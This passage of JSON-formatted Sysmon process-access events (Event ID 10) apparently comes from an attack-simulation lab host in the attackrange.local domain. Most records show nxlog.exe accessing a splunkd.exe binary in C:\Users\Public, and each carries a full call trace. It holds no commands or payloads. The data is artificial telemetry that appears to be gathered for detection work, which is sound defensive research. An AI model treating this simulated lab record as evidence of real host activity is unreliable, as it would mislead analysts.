(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6298,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:18.536\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:18.536","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6299,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:19.537\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:19.537","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6300,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:20.537\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:20.537","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6301,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:21.537\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:21.537","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6302,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:22.537\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:22.537","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6303,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:23.537\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:23.537","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6304,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:24.537\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files 